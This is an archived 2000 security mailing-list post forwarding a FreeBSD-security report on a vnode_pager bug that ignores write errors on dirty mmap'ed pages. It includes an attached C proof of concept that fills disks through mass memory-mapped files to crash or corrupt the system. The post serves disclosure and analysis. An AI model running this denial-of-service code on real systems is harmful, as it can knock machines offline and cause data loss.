tech-security: FreeBSDDEATH.c.txt (mmap dirty page no check bug) (fwd)

Subject: FreeBSDDEATH.c.txt (mmap dirty page no check bug) (fwd)
To: None <tech-security@netbsd.org>
From: Darren Reed <avalon@coombs.anu.edu.au>
List: tech-security
Date: 06/02/2000 23:07:21
  by mail.netbsd.org with SMTP; 2 Jun 2000 13:07:32 -0000
	by cairo.anu.edu.au (8.9.3/8.9.3) id XAA24697
	for tech-security@netbsd.org; Fri, 2 Jun 2000 23:07:21 +1000 (EST)
From: Darren Reed <avalon@coombs.anu.edu.au>
Message-Id: <200006021307.XAA24697@cairo.anu.edu.au>
Subject: FreeBSDDEATH.c.txt (mmap dirty page no check bug) (fwd)
To: tech-security@netbsd.org
Date: Fri, 2 Jun 2000 23:07:21 +1000 (Australia/NSW)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

I haven't checked this yet, forwarding first.

Forwarded message:
> From owner-freebsd-security@FreeBSD.ORG Fri Jun  2 23:03 EST 2000
> Delivered-To: freebsd-security@freebsd.org
> Date: Fri, 2 Jun 2000 14:09:06 +0100
> From: User Datagram Protocol <udp@closed-networks.com>
> To: freebsd-security@FreeBSD.ORG
> Subject: FreeBSDDEATH.c.txt (mmap dirty page no check bug)
> Message-ID: <20000602140906.I70438@closed-networks.com>
> Reply-To: User Datagram Protocol <udp@closed-networks.com>
> Mime-Version: 1.0
> Content-Transfer-Encoding: 8bit
> X-Mailer: Mutt 1.0.1i
> X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead
> Organization: Closed Networks Limited, London, UK
> Sender: owner-freebsd-security@FreeBSD.ORG
> X-Loop: FreeBSD.org
> Precedence: bulk
> Content-Type: multipart/mixed; boundary="nOM8ykUjac0mNN89"
> Content-Length: 3798
> 
> 
> --nOM8ykUjac0mNN89
> Content-Type: text/plain; charset=us-ascii
> 
> Yo,
> 
> This seems to be doing the rounds with the script kiddies fairly quickly.
> I've attached it.
> (originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped
> by some skr1pt k1dd1es on irc)
> 
> vnode_pager_putpages() only does this check against the return value of
> VOP_PUTPAGES():
>         rtval = VOP_PUTPAGES(vp, m, bytes, sync, rtvals, 0);
>         if (rtval == EOPNOTSUPP) {
> 
> And vnode_pager_generic_putpages() appears to force the return value for
> all page writes that it does to VM_PAGER_OK even when an error occurs in
> VOP_WRITE().
> 
> The above is based on a quick inspection of the 4.0-STABLE fork source tree.
> So, this guy has a point.
> 
> Apologies if this issue was posted to any other lists, but it came my way,
> I am not currently on bugtraq due to some mail issues, and it looks like
> something we should be aware of (albeit really a quality of implementation
> issue that gets hit during times of high load - like something else I have
> in the pipeline. Heh.)
> 
> Regards
> -- 
> Bruce M. Simpson aka 'udp'       Security Analyst & UNIX Development Engineer
>                                             WWW: www.closed-networks.com/~udp 
> Dundee                                             www.packetfactory.net/~udp
> United Kingdom                            email:      udp@closed-networks.com
> 
> --nOM8ykUjac0mNN89
> Content-Type: text/plain
> Content-Disposition: attachment; filename="FreeBSDDEATH.c.txt"
> Content-Transfer-Encoding: 8bit
> 
> /*
> From: Oleg Derevenetz <Oleg.Derevenetz@p4.f3.n5025.z2.fidonet.org>
> Date: Wed, 31 May 2000 19:04:12 +0400
> Subject: mmap
> Message-ID: <959790285@p4.f3.n5025.z2.ftn>
> 
> Draft English translation: in vnode_pager.c there is no any check for
> errors on write of ditry mmap'ed pages to disk. If there is no enough
> space or any other I/O error occur, the results will be very bad.
> 
> It will be good to kill the calling process, but it's hard to find out
> the owner of offending page.
> 
> Дело в том, что в vnode_pager.c не предусмотрена никакая обработка
> ошибок при сбросе грязных mmap'ленных страниц файла на диск, если на
> диске недостаточно места для такого сброса (да и вообще при любой ошибке
> I/O), и это приводит к очень плохим результатам. Где-то полгода назад я
> переписывался с людьми из freebsd.hackers, они меня по большому счету
> просто послали. VM сделана достаточно криво, поэтому мне придумать
> реакцию на такую проблему пока не удалось. Желательно было бы прибить
> процесс, но извлечь информацию о том, какому процессу принадлежит
> страница, при сбросе которой произошла ошибка, весьма затруднительно.
> Вот сижу сейчас, ломаю голову, что делать...
> 
> Кстати, а здесь никто не занимается ядерным VM ?
> */
> 
> #include <sys/types.h>
> #include <sys/mman.h>
> #include <stdio.h>
> #include <string.h>
> #include <fcntl.h>
> #include <errno.h>
> 
> #define COUNT   1024*1024
> #define SIZE    10*1024*1024
> 
> int main () {
>     int i,j,fd;
>     char *fptr, fname [16];
>     
>     for (i=0;i<COUNT;i++) {
>         sprintf (fname, "%d", i);
>         printf ("DEBUG: fname: %s\n", fname); fflush (stdout);
>         
>         fd=open (fname, O_RDWR|O_CREAT, 644);
>         lseek (fd, SIZE, SEEK_SET);
>         write (fd, "-", 1);
>         printf ("DEBUG: write\n"); fflush (stdout);
>         
>         if ((fptr=mmap (NULL, SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd,      
>                  0))==MAP_FAILED) {
>             printf ("mmap() failed !\n"); fflush (stdout);
>             return 0;
>         }
>         printf ("DEBUG: mmap, errno=%d\n", errno); fflush (stdout);
>         
>         for (j=0;j<SIZE;j++)
>             fptr[j]='o';
>         printf ("DEBUG: fill\n"); fflush (stdout);
>     }
>     
>     return 0;
> }
> 
> --nOM8ykUjac0mNN89--
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>